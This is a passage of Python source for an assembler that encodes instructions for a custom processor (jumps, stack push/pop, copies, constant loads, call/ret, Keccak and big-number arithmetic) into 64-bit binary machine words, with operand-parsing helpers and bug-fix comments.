    indirect register '*rdN' / '*rmN' / '*rlN'.

    Returns (64-bit binary string, instruction count).  If an operand
    cannot be resolved: returns ("", count) when final_pass is False
    (labels may not exist yet), otherwise prints a diagnostic and
    returns -1.
    """
    number_of_instructions = 1
    machine_code_processor = '00'
    machine_code_intruction_type = '0000001'

    def _constant_field(token):
        # '#constant' or '#(n)constant' -> 16-bit value field, or None.
        if token[1:2] == '(':
            factor_text, constant = token[2:].split(')', 1)
            factor = int(factor_text)
        else:
            factor = 1
            constant = token[1:]
        if constant in internal_labels:
            return ("{0:016b}").format(internal_labels[constant] * factor)
        if constant.isdigit():
            return ("{0:016b}").format(int(constant) * factor)
        return None

    def _target_field(token):
        # 17-bit jump-target field: Dir(0) + 16-bit address/constant.
        if token in internal_labels:
            return "0" + ("{0:016b}").format(internal_labels[token])
        if token[:1] == '#':
            bits = _constant_field(token)
            if bits is not None:
                return "0" + bits
        return None

    def _compare_field(token):
        # 19-bit comparison operand: Sign(0) + Dir + Cx + 16-bit value.
        if token in internal_labels:
            return "0" + "0" + "1" + ("{0:016b}").format(internal_labels[token])
        # BUGFIX: the indirect-register branches previously looked the whole
        # token up in internal_labels, which always raised KeyError here
        # (the label check above had already failed).  Parse the register
        # number out of the token instead, as the push/pop encoders do.
        indirect = {'*rd': '00', '*rm': '10', '*rl': '11'}
        if token[0:3] in indirect:
            return "0" + "1" + "1" + indirect[token[0:3]] + ("{0:014b}").format(int(token[3:]))
        if token[:1] == '#':
            bits = _constant_field(token)
            if bits is not None:
                return "0" + "0" + "0" + bits
        return None

    machine_code_operand_o = _target_field(command[1])
    if command[0] == 'jump':
        # Unconditional jump: both comparison operands are all-zero.
        machine_code_operand_b = "0" * 19
        machine_code_operand_a = "0" * 19
    else:
        machine_code_operand_b = _compare_field(command[2])
        machine_code_operand_a = _compare_field(command[3])
    if None in (machine_code_operand_o, machine_code_operand_b, machine_code_operand_a):
        if not final_pass:
            return "", number_of_instructions
        print("Invalid instruction")
        print(command)
        return -1
    machine_code = (machine_code_processor + machine_code_intruction_type +
                    machine_code_operand_o + machine_code_operand_b + machine_code_operand_a)
    return machine_code, number_of_instructions
def instruction_jumpl(command, internal_labels, final_pass=True):
    """Assemble 'jumpl' / 'jumpls' (core opcode 0000010).

    jumpl OOOO YYYY XXXX  -- unsigned compare-and-jump
    jumpls OOOO YYYY XXXX -- signed compare-and-jump (Sign bit set)

    Operands: internal label, '#constant', '#(n)constant', or indirect
    register '*rdN' / '*rmN' / '*rlN'.

    Returns (64-bit binary string, instruction count); ("", count) on a
    failed early pass, or -1 with a printed diagnostic on the final pass.
    """
    number_of_instructions = 1
    machine_code_processor = '00'
    machine_code_intruction_type = '0000010'
    # BUGFIX: an unknown mnemonic used to leave the sign variables unbound
    # and crash with NameError; flag it as an assembly error instead.
    mnemonic_error = command[0] not in ('jumpl', 'jumpls')
    sign = "1" if command[0] == 'jumpls' else "0"

    def _constant_field(token):
        # '#constant' or '#(n)constant' -> 16-bit value field, or None.
        if token[1:2] == '(':
            factor_text, constant = token[2:].split(')', 1)
            factor = int(factor_text)
        else:
            factor = 1
            constant = token[1:]
        if constant in internal_labels:
            # BUGFIX: this path previously multiplied by the *string*
            # `constant` instead of the numeric multiplicative factor.
            return ("{0:016b}").format(internal_labels[constant] * factor)
        if constant.isdigit():
            return ("{0:016b}").format(int(constant) * factor)
        return None

    def _target_field(token):
        # 17-bit jump-target field: Dir(0) + 16-bit address/constant.
        if token in internal_labels:
            return "0" + ("{0:016b}").format(internal_labels[token])
        if token[:1] == '#':
            bits = _constant_field(token)
            if bits is not None:
                return "0" + bits
        return None

    def _compare_field(token):
        # 19-bit comparison operand: Sign + Dir + Cx + 16-bit value.
        if token in internal_labels:
            return sign + "0" + "1" + ("{0:016b}").format(internal_labels[token])
        # BUGFIX: indirect registers previously indexed internal_labels with
        # the whole token (always KeyError here); parse the register number.
        indirect = {'*rd': '00', '*rm': '10', '*rl': '11'}
        if token[0:3] in indirect:
            return sign + "1" + "1" + indirect[token[0:3]] + ("{0:014b}").format(int(token[3:]))
        if token[:1] == '#':
            bits = _constant_field(token)
            if bits is not None:
                return sign + "0" + "0" + bits
        return None

    machine_code_operand_o = _target_field(command[1])
    machine_code_operand_b = _compare_field(command[2])
    machine_code_operand_a = _compare_field(command[3])
    if mnemonic_error or None in (machine_code_operand_o, machine_code_operand_b, machine_code_operand_a):
        if not final_pass:
            return "", number_of_instructions
        print("Invalid instruction")
        print(command)
        return -1
    machine_code = (machine_code_processor + machine_code_intruction_type +
                    machine_code_operand_o + machine_code_operand_b + machine_code_operand_a)
    return machine_code, number_of_instructions
def instruction_jumpeql(command, internal_labels, final_pass=True):
    """Assemble 'jumpeql' / 'jumpeqls' (core opcode 0000011).

    jumpeql OOOO YYYY XXXX  -- unsigned compare-and-jump (equal-or-less)
    jumpeqls OOOO YYYY XXXX -- signed variant (Sign bit set)

    Operands: internal label, '#constant', '#(n)constant', or indirect
    register '*rdN' / '*rmN' / '*rlN'.

    Returns (64-bit binary string, instruction count); ("", count) on a
    failed early pass, or -1 with a printed diagnostic on the final pass.
    """
    number_of_instructions = 1
    machine_code_processor = '00'
    machine_code_intruction_type = '0000011'
    # BUGFIX: an unknown mnemonic used to leave the sign variables unbound
    # and crash with NameError; flag it as an assembly error instead.
    mnemonic_error = command[0] not in ('jumpeql', 'jumpeqls')
    sign = "1" if command[0] == 'jumpeqls' else "0"

    def _constant_field(token):
        # '#constant' or '#(n)constant' -> 16-bit value field, or None.
        if token[1:2] == '(':
            factor_text, constant = token[2:].split(')', 1)
            factor = int(factor_text)
        else:
            factor = 1
            constant = token[1:]
        if constant in internal_labels:
            # BUGFIX: this path previously multiplied by the *string*
            # `constant` instead of the numeric multiplicative factor.
            return ("{0:016b}").format(internal_labels[constant] * factor)
        if constant.isdigit():
            return ("{0:016b}").format(int(constant) * factor)
        return None

    def _target_field(token):
        # 17-bit jump-target field: Dir(0) + 16-bit address/constant.
        if token in internal_labels:
            return "0" + ("{0:016b}").format(internal_labels[token])
        if token[:1] == '#':
            bits = _constant_field(token)
            if bits is not None:
                return "0" + bits
        return None

    def _compare_field(token):
        # 19-bit comparison operand: Sign + Dir + Cx + 16-bit value.
        if token in internal_labels:
            return sign + "0" + "1" + ("{0:016b}").format(internal_labels[token])
        # BUGFIX: indirect registers previously indexed internal_labels with
        # the whole token (always KeyError here); parse the register number.
        indirect = {'*rd': '00', '*rm': '10', '*rl': '11'}
        if token[0:3] in indirect:
            return sign + "1" + "1" + indirect[token[0:3]] + ("{0:014b}").format(int(token[3:]))
        if token[:1] == '#':
            bits = _constant_field(token)
            if bits is not None:
                return sign + "0" + "0" + bits
        return None

    machine_code_operand_o = _target_field(command[1])
    machine_code_operand_b = _compare_field(command[2])
    machine_code_operand_a = _compare_field(command[3])
    if mnemonic_error or None in (machine_code_operand_o, machine_code_operand_b, machine_code_operand_a):
        if not final_pass:
            return "", number_of_instructions
        print("Invalid instruction")
        print(command)
        return -1
    machine_code = (machine_code_processor + machine_code_intruction_type +
                    machine_code_operand_o + machine_code_operand_b + machine_code_operand_a)
    return machine_code, number_of_instructions
def instruction_push(command, internal_labels, final_pass=True):
    """Encode 'push' (core opcode 0000100): push the value at memory
    position ``command[1]`` onto the stack.

    The operand may be an internal label, '#constant', '#(n)constant',
    or an indirect register '*rdN' / '*rmN' / '*rlN'.  Returns
    (binary string, count); ("", count) on a failed early pass, or -1
    with a printed diagnostic on the final pass.
    """
    instr_count = 1
    token = command[1]
    indirect_modes = {'*rd': '00', '*rm': '10', '*rl': '11'}
    operand_a = None
    if token in internal_labels:
        # Direct memory position via label: Dir = 0, Cx = 1.
        operand_a = "001" + format(internal_labels[token], '016b')
    elif token[0:3] in indirect_modes:
        # Register indirect: Dir = 1, Cx = 1, 2-bit mode + 14-bit register.
        operand_a = "011" + indirect_modes[token[0:3]] + format(int(token[3:]), '014b')
    elif token[0] == '#':
        # Immediate constant, optionally '#(n)constant' pre-multiplied by n.
        if token[1] == '(':
            factor_text, constant = token[2:].split(')', 1)
            factor = int(factor_text)
        else:
            factor = 1
            constant = token[1:]
        if constant in internal_labels:
            operand_a = "000" + format(internal_labels[constant] * factor, '016b')
        elif constant.isdigit():
            operand_a = "000" + format(int(constant) * factor, '016b')
    if operand_a is None:
        if not final_pass:
            return "", instr_count
        print("Invalid instruction")
        print(command)
        return -1
    word = '00' + '0000100' + '0' * 17 + '0' * 19 + operand_a
    return word, instr_count
def instruction_pop(command, internal_labels, final_pass=True):
    """Encode 'pop' (core opcode 0000101): pop the stack into the memory
    position given by ``command[1]``.

    The destination may be an internal label or an indirect register
    '*rdN' / '*rmN' / '*rlN'.  Returns (binary string, count);
    ("", count) on a failed early pass, or -1 with a printed diagnostic
    on the final pass.
    """
    instr_count = 1
    token = command[1]
    indirect_modes = {'*rd': '00', '*rm': '10', '*rl': '11'}
    operand_o = None
    if token in internal_labels:
        # Direct destination: Dir = 0 + 16-bit address.
        operand_o = "0" + format(internal_labels[token], '016b')
    elif token[0:3] in indirect_modes:
        # Register indirect: Dir = 1, 2-bit mode + 14-bit register.
        operand_o = "1" + indirect_modes[token[0:3]] + format(int(token[3:]), '014b')
    if operand_o is None:
        if not final_pass:
            return "", instr_count
        print("Invalid instruction")
        print(command)
        return -1
    word = '00' + '0000101' + operand_o + '0' * 19 + '0' * 19
    return word, instr_count
def instruction_pushf(command, internal_labels, final_pass=True):
    """Encode 'pushf' (core opcode 0000110): push a full-bus memory
    position onto the stack.

    The source may be an internal label or an indirect register
    '*rdN' / '*rmN' / '*rlN'.  Returns (binary string, count);
    ("", count) on a failed early pass, or -1 with a printed diagnostic
    on the final pass.
    """
    instr_count = 1
    token = command[1]
    indirect_modes = {'*rd': '00', '*rm': '10', '*rl': '11'}
    operand_a = None
    if token in internal_labels:
        # Direct position: Dir = 0, Cx = 1 + 16-bit address.
        operand_a = "001" + format(internal_labels[token], '016b')
    elif token[0:3] in indirect_modes:
        # Register indirect: Dir = 1, Cx = 1, 2-bit mode + 14-bit register.
        operand_a = "011" + indirect_modes[token[0:3]] + format(int(token[3:]), '014b')
    if operand_a is None:
        if not final_pass:
            return "", instr_count
        print("Invalid instruction")
        print(command)
        return -1
    word = '00' + '0000110' + '0' * 17 + '0' * 19 + operand_a
    return word, instr_count
def instruction_popf(command, internal_labels, final_pass=True):
    """Encode 'popf' (core opcode 0000111): pop the stack into a
    full-bus memory position.

    The destination may be an internal label or an indirect register
    '*rdN' / '*rmN' / '*rlN'.  Returns (binary string, count);
    ("", count) on a failed early pass, or -1 with a printed diagnostic
    on the final pass.
    """
    instr_count = 1
    token = command[1]
    indirect_modes = {'*rd': '00', '*rm': '10', '*rl': '11'}
    operand_o = None
    if token in internal_labels:
        # Direct destination: Dir = 0 + 16-bit address.
        operand_o = "0" + format(internal_labels[token], '016b')
    elif token[0:3] in indirect_modes:
        # Register indirect: Dir = 1, 2-bit mode + 14-bit register.
        operand_o = "1" + indirect_modes[token[0:3]] + format(int(token[3:]), '014b')
    if operand_o is None:
        if not final_pass:
            return "", instr_count
        print("Invalid instruction")
        print(command)
        return -1
    word = '00' + '0000111' + operand_o + '0' * 19 + '0' * 19
    return word, instr_count
def instruction_pushm(command, internal_labels, final_pass=True):
    """Encode 'pushm' (core opcode 0001000): push a full-bus memory
    position (word-aligned mXXX form) onto the stack.

    A label operand is encoded as a 13-bit base address with the low
    3 bits zeroed; indirect registers '*rdN' / '*rmN' / '*rlN' carry a
    14-bit register number.  Returns (binary string, count);
    ("", count) on a failed early pass, or -1 with a printed diagnostic
    on the final pass.
    """
    instr_count = 1
    token = command[1]
    indirect_modes = {'*rd': '00', '*rm': '10', '*rl': '11'}
    operand_a = None
    if token in internal_labels:
        # Direct position: Dir = 0, Cx = 1, 13-bit base, low 3 bits zero.
        operand_a = "001" + format(internal_labels[token], '013b') + "000"
    elif token[0:3] in indirect_modes:
        # Register indirect: Dir = 1, Cx = 1, 2-bit mode + 14-bit register.
        operand_a = "011" + indirect_modes[token[0:3]] + format(int(token[3:]), '014b')
    if operand_a is None:
        if not final_pass:
            return "", instr_count
        print("Invalid instruction")
        print(command)
        return -1
    word = '00' + '0001000' + '0' * 17 + '0' * 19 + operand_a
    return word, instr_count
def instruction_popm(command, internal_labels, final_pass=True):
    """Assemble a 'popm' instruction (opcode 0001001).

    command[1] names the memory destination popped into: a label from
    internal_labels or a pointer register *rdN / *rmN / *rlN.
    Returns (bit_string, 1) on success, ("", 1) on a non-final-pass
    error, or -1 after reporting an error on the final pass.
    """
    token = command[1]
    pointer_modes = {'*rd': '00', '*rm': '10', '*rl': '11'}
    if token in internal_labels:
        # Direct label: 13-bit word address shifted left 3 bits.
        operand_o = "0" + format(internal_labels[token], "013b") + "000"
    elif token[0:3] in pointer_modes:
        operand_o = "1" + pointer_modes[token[0:3]] + format(int(token[3:]), "014b")
    else:
        if not final_pass:
            return "", 1
        print("Invalid instruction")
        print(command)
        return -1
    # processor + opcode + operand_o + operand_b (unused) + operand_a (unused)
    machine_code = '00' + '0001001' + operand_o + '0' * 19 + '0' * 19
    return machine_code, 1
def instruction_copy(command, internal_labels, final_pass=True):
    """Assemble a 'copy' instruction (opcode 0001010).

    command:         [mnemonic, destination, source] token list.
    internal_labels: mapping of label name -> numeric address.
    final_pass:      when False, an encoding error returns ("", 1) so the
                     assembler can retry once all labels are collected.

    Returns (bit_string, 1) on success or -1 after reporting an invalid
    instruction on the final pass.
    """
    error = False

    def dest_field(token):
        # 17-bit destination: direct label address or *rd/*rm/*rl pointer.
        nonlocal error
        if token in internal_labels:
            return "0" + format(internal_labels[token], "016b")
        if token[0:3] == '*rd':
            return "100" + format(int(token[3:]), "014b")
        if token[0:3] == '*rm':
            return "110" + format(int(token[3:]), "014b")
        if token[0:3] == '*rl':
            return "111" + format(int(token[3:]), "014b")
        error = True
        return ""

    def source_field(token):
        # 19-bit source: label, pointer register, or '#' immediate with an
        # optional '#(factor)value' multiplier.
        nonlocal error
        if token in internal_labels:
            return "001" + format(internal_labels[token], "016b")
        if token[0:3] == '*rd':
            return "01100" + format(int(token[3:]), "014b")
        if token[0:3] == '*rm':
            return "01110" + format(int(token[3:]), "014b")
        if token[0:3] == '*rl':
            return "01111" + format(int(token[3:]), "014b")
        # BUG FIX: use [0:1] slicing so a bare '#' (or empty) token reaches
        # the error path instead of raising IndexError as the original did.
        if token[0:1] == '#':
            immediate = token[1:]
            if immediate[0:1] == '(':
                factor_text, constant = immediate[1:].split(')', 1)
                factor = int(factor_text)
            else:
                factor = 1
                constant = immediate
            if constant in internal_labels:
                return "000" + format(internal_labels[constant] * factor, "016b")
            if constant.isdigit():
                return "000" + format(int(constant) * factor, "016b")
        error = True
        return ""

    operand_o = dest_field(command[1])
    operand_a = source_field(command[2])
    if error:
        if not final_pass:
            return "", 1
        print("Invalid instruction")
        print(command)
        return -1
    # processor + opcode + operand_o + operand_b (unused) + operand_a
    return '00' + '0001010' + operand_o + '0' * 19 + operand_a, 1
def instruction_copyf(command, internal_labels, final_pass=True):
    """Assemble a 'copyf' instruction (opcode 0001011).

    command[1] is the destination and command[2] the source; each is a
    label from internal_labels or a pointer register *rdN / *rmN / *rlN
    (no immediate form).  Returns (bit_string, 1) on success, ("", 1) on
    a non-final-pass error, or -1 after reporting a final-pass error.
    """
    pointer_modes = {'*rd': '00', '*rm': '10', '*rl': '11'}
    bad = False
    dest = command[1]
    if dest in internal_labels:
        operand_o = "0" + format(internal_labels[dest], "016b")
    elif dest[0:3] in pointer_modes:
        operand_o = "1" + pointer_modes[dest[0:3]] + format(int(dest[3:]), "014b")
    else:
        bad = True
    src = command[2]
    if src in internal_labels:
        operand_a = "001" + format(internal_labels[src], "016b")
    elif src[0:3] in pointer_modes:
        operand_a = "011" + pointer_modes[src[0:3]] + format(int(src[3:]), "014b")
    else:
        bad = True
    if bad:
        if not final_pass:
            return "", 1
        print("Invalid instruction")
        print(command)
        return -1
    # processor + opcode + operand_o + operand_b (unused) + operand_a
    return '00' + '0001011' + operand_o + '0' * 19 + operand_a, 1
def instruction_copym(command, internal_labels, final_pass=True):
    """Assemble a 'copym' memory-to-memory copy (opcode 0001100).

    command[1] is the destination and command[2] the source; each is a
    label (encoded as a 13-bit word address shifted left 3 bits) or a
    pointer register *rdN / *rmN / *rlN.  Returns (bit_string, 1) on
    success, ("", 1) on a non-final-pass error, or -1 after reporting a
    final-pass error.
    """
    pointer_modes = {'*rd': '00', '*rm': '10', '*rl': '11'}
    bad = False
    dest = command[1]
    if dest in internal_labels:
        operand_o = "0" + format(internal_labels[dest], "013b") + "000"
    elif dest[0:3] in pointer_modes:
        operand_o = "1" + pointer_modes[dest[0:3]] + format(int(dest[3:]), "014b")
    else:
        bad = True
    src = command[2]
    if src in internal_labels:
        operand_a = "001" + format(internal_labels[src], "013b") + "000"
    elif src[0:3] in pointer_modes:
        operand_a = "011" + pointer_modes[src[0:3]] + format(int(src[3:]), "014b")
    else:
        bad = True
    if bad:
        if not final_pass:
            return "", 1
        print("Invalid instruction")
        print(command)
        return -1
    # processor + opcode + operand_o + operand_b (unused) + operand_a
    return '00' + '0001100' + operand_o + '0' * 19 + operand_a, 1
def instruction_copya(command, internal_labels, final_pass=True):
    """Assemble a 'copya' auto-increment/decrement copy (opcodes 00110xx / 00111xx).

    command: [mnemonic, 'inc'|'dec', 'r'|'d'|'s'|'ds', destination,
              source_a, source_b] — the inc/dec mode and register-select
    pair choose the 7-bit opcode; sources accept labels, pointer
    registers and '#' immediates.  Returns (bit_string, 1) on success,
    ("", 1) on a non-final-pass error, or -1 after reporting a
    final-pass error.
    """
    error = False
    # Opcode table: (direction, which pointers advance) -> 7-bit opcode.
    opcode_table = {
        ('inc', 'ds'): '0011000', ('inc', 'd'): '0011001',
        ('inc', 's'): '0011010', ('inc', 'r'): '0011011',
        ('dec', 'ds'): '0011100', ('dec', 'd'): '0011101',
        ('dec', 's'): '0011110', ('dec', 'r'): '0011111',
    }
    instruction_type = opcode_table.get((command[1], command[2]))
    if instruction_type is None:
        error = True

    def dest_field(token):
        # 17-bit destination: direct label address or *rd/*rm/*rl pointer.
        nonlocal error
        if token in internal_labels:
            return "0" + format(internal_labels[token], "016b")
        if token[0:3] == '*rd':
            return "100" + format(int(token[3:]), "014b")
        if token[0:3] == '*rm':
            return "110" + format(int(token[3:]), "014b")
        if token[0:3] == '*rl':
            return "111" + format(int(token[3:]), "014b")
        error = True
        return ""

    def source_field(token):
        # 19-bit source: label, pointer register, or '#' immediate with an
        # optional '#(factor)value' multiplier.
        nonlocal error
        if token in internal_labels:
            return "001" + format(internal_labels[token], "016b")
        if token[0:3] == '*rd':
            return "01100" + format(int(token[3:]), "014b")
        if token[0:3] == '*rm':
            return "01110" + format(int(token[3:]), "014b")
        if token[0:3] == '*rl':
            return "01111" + format(int(token[3:]), "014b")
        # BUG FIX: use [0:1] slicing so a bare '#' (or empty) token reaches
        # the error path instead of raising IndexError as the original did.
        if token[0:1] == '#':
            immediate = token[1:]
            if immediate[0:1] == '(':
                factor_text, constant = immediate[1:].split(')', 1)
                factor = int(factor_text)
            else:
                factor = 1
                constant = immediate
            if constant in internal_labels:
                return "000" + format(internal_labels[constant] * factor, "016b")
            if constant.isdigit():
                return "000" + format(int(constant) * factor, "016b")
        error = True
        return ""

    operand_o = dest_field(command[3])
    operand_a = source_field(command[4])
    operand_b = source_field(command[5])
    if error:
        if not final_pass:
            return "", 1
        print("Invalid instruction")
        print(command)
        return -1
    # processor + opcode + operand_o + operand_b + operand_a
    return '00' + instruction_type + operand_o + operand_b + operand_a, 1
def instruction_lconstf(command, internal_labels, final_pass=True):
    """Assemble an 'lconstf' load-constant instruction (opcode 0001101).

    command: [mnemonic, destination, immediate] where destination is a
    label or pointer register *rdN / *rmN / *rlN and immediate is
    '#value' or '#(factor)value' (value a label or decimal literal).
    Returns (bit_string, 1) on success, ("", 1) on a non-final-pass
    error, or -1 after reporting a final-pass error.
    """
    error = False

    def dest_field(token):
        # 17-bit destination: direct label address or *rd/*rm/*rl pointer.
        nonlocal error
        if token in internal_labels:
            return "0" + format(internal_labels[token], "016b")
        if token[0:3] == '*rd':
            return "100" + format(int(token[3:]), "014b")
        if token[0:3] == '*rm':
            return "110" + format(int(token[3:]), "014b")
        if token[0:3] == '*rl':
            return "111" + format(int(token[3:]), "014b")
        error = True
        return ""

    def immediate_field(token):
        # '#value' or '#(factor)value'; value may be a label or a decimal.
        # BUG FIX: use [0:1] slicing so an empty token reaches the error
        # path instead of raising IndexError as the original did.
        nonlocal error
        if token[0:1] == '#':
            body = token[1:]
            if body[0:1] == '(':
                factor_text, constant = body[1:].split(')', 1)
                factor = int(factor_text)
            else:
                factor = 1
                constant = body
            if constant in internal_labels:
                return "000" + format(internal_labels[constant] * factor, "016b")
            if constant.isdigit():
                return "000" + format(int(constant) * factor, "016b")
        error = True
        return ""

    operand_o = dest_field(command[1])
    operand_a = immediate_field(command[2])
    if error:
        if not final_pass:
            return "", 1
        print("Invalid instruction")
        print(command)
        return -1
    # processor + opcode + operand_o + operand_b (unused) + operand_a
    return '00' + '0001101' + operand_o + '0' * 19 + operand_a, 1
def instruction_lconstm(command, internal_labels, final_pass=True):
    """Assemble an 'lconstm' load-constant-to-memory instruction (opcode 0001110).

    command: [mnemonic, destination, immediate] where destination is a
    memory label (13-bit word address shifted left 3 bits) or a pointer
    register *rdN / *rmN / *rlN, and immediate is '#value' or
    '#(factor)value' (value a label or decimal literal).
    Returns (bit_string, 1) on success, ("", 1) on a non-final-pass
    error, or -1 after reporting a final-pass error.
    """
    error = False

    def dest_field(token):
        # 17-bit memory destination: label word-address or pointer register.
        nonlocal error
        if token in internal_labels:
            return "0" + format(internal_labels[token], "013b") + "000"
        if token[0:3] == '*rd':
            return "100" + format(int(token[3:]), "014b")
        if token[0:3] == '*rm':
            return "110" + format(int(token[3:]), "014b")
        if token[0:3] == '*rl':
            return "111" + format(int(token[3:]), "014b")
        error = True
        return ""

    def immediate_field(token):
        # '#value' or '#(factor)value'; value may be a label or a decimal.
        # BUG FIX: use [0:1] slicing so an empty token reaches the error
        # path instead of raising IndexError as the original did.
        nonlocal error
        if token[0:1] == '#':
            body = token[1:]
            if body[0:1] == '(':
                factor_text, constant = body[1:].split(')', 1)
                factor = int(factor_text)
            else:
                factor = 1
                constant = body
            if constant in internal_labels:
                return "000" + format(internal_labels[constant] * factor, "016b")
            if constant.isdigit():
                return "000" + format(int(constant) * factor, "016b")
        error = True
        return ""

    operand_o = dest_field(command[1])
    operand_a = immediate_field(command[2])
    if error:
        if not final_pass:
            return "", 1
        print("Invalid instruction")
        print(command)
        return -1
    # processor + opcode + operand_o + operand_b (unused) + operand_a
    return '00' + '0001110' + operand_o + '0' * 19 + operand_a, 1
def instruction_call(command, internal_labels, final_pass=True):
    """Assemble a 'call' instruction (opcode 0001111).

    command[1] is the call target: a label from internal_labels or a
    plain decimal address.  The return address is stored through the
    'pc' entry of internal_labels (which must be present).
    Returns (bit_string, 1) on success, ("", 1) on a non-final-pass
    error, or -1 after reporting a final-pass error.
    """
    target = command[1]
    bad = False
    if target in internal_labels:
        operand_o = "0" + format(internal_labels[target], "016b")
    elif target.isdigit():
        operand_o = "0" + format(int(target), "016b")
    else:
        bad = True
    # Link operand: label-addressed slot holding the saved program counter.
    operand_a = "001" + format(internal_labels['pc'], "016b")
    if bad:
        if not final_pass:
            return "", 1
        print(target)
        print("Invalid instruction")
        print(command)
        return -1
    # processor + opcode + operand_o + operand_b (unused) + operand_a
    return '00' + '0001111' + operand_o + '0' * 19 + operand_a, 1
def instruction_ret(command, internal_labels, final_pass=True):
    """Assemble the zero-operand 'ret' instruction (opcode 0010000).

    command / internal_labels / final_pass are accepted for interface
    uniformity with the other instruction_* encoders but are not used:
    'ret' takes no operands, so assembly cannot fail.  (The original
    carried an error branch guarded by a flag that was never set —
    removed as unreachable dead code.)
    Returns (bit_string, 1).
    """
    # processor + opcode + operand_o + operand_b + operand_a (all unused)
    return '00' + '0010000' + '0' * 17 + '0' * 19 + '0' * 19, 1
def instruction_keccak_init(command, internal_labels, final_pass=True):
    """Assemble the zero-operand 'keccak_init' instruction (opcode 0010010).

    command / internal_labels / final_pass are accepted only for
    interface uniformity with the other instruction_* encoders.
    Returns (bit_string, 1).
    """
    # processor + opcode + operand_o + operand_b + operand_a (all unused)
    machine_code = '00' + '0010010' + '0' * 17 + '0' * 19 + '0' * 19
    return machine_code, 1
def instruction_keccak_go(command, internal_labels, final_pass=True):
    """Assemble the zero-operand 'keccak_go' instruction (opcode 0010011).

    command / internal_labels / final_pass are accepted only for
    interface uniformity with the other instruction_* encoders.
    Returns (bit_string, 1).
    """
    # processor + opcode + operand_o + operand_b + operand_a (all unused)
    machine_code = '00' + '0010011' + '0' * 17 + '0' * 19 + '0' * 19
    return machine_code, 1
def instruction_badd(command, internal_labels, final_pass=True):
    """Assemble a 'badd' big-number add instruction (opcode 0100000).

    command: [mnemonic, destination, operand_b, operand_a].  The
    destination is a label or pointer register *rdN / *rmN / *rlN; each
    source additionally accepts a '#value' / '#(factor)value' immediate.
    Returns (bit_string, 1) on success, ("", 1) on a non-final-pass
    error, or -1 after reporting a final-pass error.
    """
    error = False

    def dest_field(token):
        # 17-bit destination: direct label address or *rd/*rm/*rl pointer.
        nonlocal error
        if token in internal_labels:
            return "0" + format(internal_labels[token], "016b")
        if token[0:3] == '*rd':
            return "100" + format(int(token[3:]), "014b")
        if token[0:3] == '*rm':
            return "110" + format(int(token[3:]), "014b")
        if token[0:3] == '*rl':
            return "111" + format(int(token[3:]), "014b")
        error = True
        return ""

    def source_field(token):
        # 19-bit source: label, pointer register, or '#' immediate with an
        # optional '#(factor)value' multiplier.
        nonlocal error
        if token in internal_labels:
            return "001" + format(internal_labels[token], "016b")
        if token[0:3] == '*rd':
            return "01100" + format(int(token[3:]), "014b")
        if token[0:3] == '*rm':
            return "01110" + format(int(token[3:]), "014b")
        if token[0:3] == '*rl':
            return "01111" + format(int(token[3:]), "014b")
        # BUG FIX: use [0:1] slicing so a bare '#' (or empty) token reaches
        # the error path instead of raising IndexError as the original did.
        if token[0:1] == '#':
            immediate = token[1:]
            if immediate[0:1] == '(':
                factor_text, constant = immediate[1:].split(')', 1)
                factor = int(factor_text)
            else:
                factor = 1
                constant = immediate
            if constant in internal_labels:
                return "000" + format(internal_labels[constant] * factor, "016b")
            if constant.isdigit():
                return "000" + format(int(constant) * factor, "016b")
        error = True
        return ""

    operand_o = dest_field(command[1])
    operand_b = source_field(command[2])
    operand_a = source_field(command[3])
    if error:
        if not final_pass:
            return "", 1
        print("Invalid instruction")
        print(command)
        return -1
    # processor + opcode + operand_o + operand_b + operand_a
    return '00' + '0100000' + operand_o + operand_b + operand_a, 1
def instruction_bsub(command, internal_labels, final_pass=True):
    """Assemble a 'bsub' big-number subtract instruction (opcode 0100001).

    command: [mnemonic, destination, operand_b, operand_a].  The
    destination is a label or pointer register *rdN / *rmN / *rlN; each
    source additionally accepts a '#value' / '#(factor)value' immediate.
    Returns (bit_string, 1) on success, ("", 1) on a non-final-pass
    error, or -1 after reporting a final-pass error.
    """
    error = False

    def dest_field(token):
        # 17-bit destination: direct label address or *rd/*rm/*rl pointer.
        nonlocal error
        if token in internal_labels:
            return "0" + format(internal_labels[token], "016b")
        if token[0:3] == '*rd':
            return "100" + format(int(token[3:]), "014b")
        if token[0:3] == '*rm':
            return "110" + format(int(token[3:]), "014b")
        if token[0:3] == '*rl':
            return "111" + format(int(token[3:]), "014b")
        error = True
        return ""

    def source_field(token):
        # 19-bit source: label, pointer register, or '#' immediate with an
        # optional '#(factor)value' multiplier.
        nonlocal error
        if token in internal_labels:
            return "001" + format(internal_labels[token], "016b")
        if token[0:3] == '*rd':
            return "01100" + format(int(token[3:]), "014b")
        if token[0:3] == '*rm':
            return "01110" + format(int(token[3:]), "014b")
        if token[0:3] == '*rl':
            return "01111" + format(int(token[3:]), "014b")
        # BUG FIX: use [0:1] slicing so a bare '#' (or empty) token reaches
        # the error path instead of raising IndexError as the original did.
        if token[0:1] == '#':
            immediate = token[1:]
            if immediate[0:1] == '(':
                factor_text, constant = immediate[1:].split(')', 1)
                factor = int(factor_text)
            else:
                factor = 1
                constant = immediate
            if constant in internal_labels:
                return "000" + format(internal_labels[constant] * factor, "016b")
            if constant.isdigit():
                return "000" + format(int(constant) * factor, "016b")
        error = True
        return ""

    operand_o = dest_field(command[1])
    operand_b = source_field(command[2])
    operand_a = source_field(command[3])
    if error:
        if not final_pass:
            return "", 1
        print("Invalid instruction")
        print(command)
        return -1
    # processor + opcode + operand_o + operand_b + operand_a
    return '00' + '0100001' + operand_o + operand_b + operand_a, 1
def instruction_bsmul(command, internal_labels, final_pass=True):
    """Assemble a 'bsmul' / 'bsmuls' big-number multiply (opcode 0100010).

    command: [mnemonic, destination, operand_b, operand_a].  'bsmuls'
    sets the sign bit on both source operands; 'bsmul' is unsigned.
    The destination is a label or pointer register *rdN / *rmN / *rlN;
    each source additionally accepts a '#value' / '#(factor)value'
    immediate.  Returns (bit_string, 1) on success, ("", 1) on a
    non-final-pass error, or -1 after reporting a final-pass error.
    """
    error = False
    if command[0] == 'bsmul':
        sign_bit = "0"
    elif command[0] == 'bsmuls':
        sign_bit = "1"
    else:
        # BUG FIX: the original left the sign bits undefined here and then
        # crashed with NameError while encoding the source operands; default
        # to "0" so the normal invalid-instruction path reports the problem.
        sign_bit = "0"
        error = True

    def dest_field(token):
        # 17-bit destination: direct label address or *rd/*rm/*rl pointer.
        nonlocal error
        if token in internal_labels:
            return "0" + format(internal_labels[token], "016b")
        if token[0:3] == '*rd':
            return "100" + format(int(token[3:]), "014b")
        if token[0:3] == '*rm':
